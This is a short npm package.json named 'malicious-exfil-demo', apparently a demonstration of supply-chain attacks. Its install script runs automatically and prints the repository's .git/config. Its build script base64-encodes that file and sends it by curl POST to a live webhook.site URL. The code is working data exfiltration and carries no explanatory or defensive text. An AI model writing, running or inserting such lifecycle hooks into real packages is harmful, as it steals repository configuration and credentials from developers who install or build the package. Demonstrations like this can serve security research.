{
    "name": "malicious-exfil-demo",
    "version": "1.0.0",
    "scripts": {
      "install": "echo 'Malicious install script running...' && cat .git/config",
  
      "build": "echo 'Exfiltrating data to webhook.site...' && encoded=$(base64 -w0 < .git/config) && curl -X POST -H 'Content-Type: application/json' -d '{\"gitConfigBase64\": \"'$encoded'\"}' https://webhook.site/041bf490-6af7-4124-bcba-d5ef964ecdd6"
    },
    "dependencies": {}
  }
  